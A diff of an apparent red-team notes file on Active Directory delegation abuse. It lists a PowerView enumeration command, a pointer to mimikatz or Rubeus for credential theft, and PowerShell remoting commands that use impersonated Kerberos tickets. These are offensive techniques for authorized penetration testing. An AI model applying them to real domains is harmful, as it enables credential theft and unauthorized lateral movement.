nmgavilan/RedTeamVault/Techniques/Active Directory.md

 Get-NetUser -TrustedToAuth # Powerview module to get service accounts trusted to authenticate users to services.
 (Accounts that can request a TGT)
 # Use mimikatz or rubeus to get credentials for this user

-# Begin a remote powershell session on a target machine (tickets should be in memory for a target user delegating WSMAN authority)
+# Begin a remote powershell session on a target machine (tickets should be in memory for an impersonated user delegating WSMAN and HTTP authority)
 New-PSSession -ComputerName <remote server name>
 Enter-PSSession -ComputerName <remote server name>
 ```